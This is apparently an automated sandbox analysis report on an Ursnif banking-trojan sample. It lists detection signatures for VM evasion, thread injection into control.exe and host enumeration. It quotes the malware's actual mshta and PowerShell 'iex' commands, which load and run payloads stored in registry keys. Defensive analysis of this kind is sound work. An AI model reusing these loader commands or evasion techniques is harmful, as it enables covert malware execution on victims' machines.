Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines

Source: C:\Windows\System32\control.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5694
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3029

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\blohq23h\blohq23h.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3upkr1gh\3upkr1gh.dll			Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3468	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 676	Thread sleep time: -922337203685477s >= -30000s

Contains functionality to enumerate / list files inside a directory

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_008F3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		1_2_008F3512
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_042FB88D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,		1_2_042FB88D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_042F4CF1 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,		1_2_042F4CF1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04305518 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,		1_2_04305518
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_042F834C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		1_2_042F834C

Contains functionality to query local drives

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_042F16E1 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

1_2_042F16E1

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: mshta.exe, 0000001D.00000002.379810120.0000029066DB4000.00000004.00000001.sdmp

Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/

Queries a list of all running processes

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_042F505D RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,

1_2_042F505D

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Contains functionality to register its own exception handler

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_042F1F12 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

1_2_042F1F12

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Source: C:\Windows\SysWOW64\regsvr32.exe

Memory allocated: C:\Windows\System32\control.exe base: E70000 protect: page execute and read and write

Jump to behavior

Changes memory attributes in foreign processes to executable or writable

Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write

Compiles code for process injection (via .Net compiler)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\3upkr1gh\3upkr1gh.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: unknown EIP: 736E1580
Source: C:\Windows\System32\control.exe	Thread created: unknown EIP: 736E1580

Maps a DLL or memory area into another process

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: unknown protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\regsvr32.exe	Thread register set: target process: 2156			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3388
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3388
Source: C:\Windows\System32\control.exe	Thread register set: target process: 6516

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6B8D212E0			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: E70000			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6B8D212E0			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\blohq23h\blohq23h.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3upkr1gh\3upkr1gh.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESA54D.tmp' 'c:\Users\user\AppData\Local\Temp\blohq23h\CSC8288F7A0C087479098ACD74FC9F3E61F.TMP'
Source: C:\Windows\System32\control.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: unknown unknown

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown

Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_008FA12A cpuid

1_2_008FA12A

Queries the installation date of Windows

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Contains functionality to create pipes for IPC

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_042F5F90 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

1_2_042F5F90

Contains functionality to query local / system time

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_008F12E8 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

1_2_008F12E8

Contains functionality to query the account / user name

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_008FA12A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

1_2_008FA12A

Contains functionality to query windows version

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_008F54D2 GetVersion,lstrcat,lstrcat,lstrcat,GetLastError,

1_2_008F54D2

Queries the cryptographic machine GUID

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.336276523.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.420376736.000001A5E0F30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336080557.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336180979.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336303683.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.343871778.00000000050CB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.428480646.000001F9546C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.455040534.00000000042F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.464915515.0000000000DEE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336209770.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336248371.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.406882710.0000000004330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336157909.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336112691.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 2156, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3732, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6708, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.336276523.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.420376736.000001A5E0F30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336080557.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336180979.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336303683.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.343871778.00000000050CB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.428480646.000001F9546C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.455040534.00000000042F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.464915515.0000000000DEE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336209770.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336248371.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.406882710.0000000004330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336157909.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.336112691.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 2156, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3732, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6708, type: MEMORY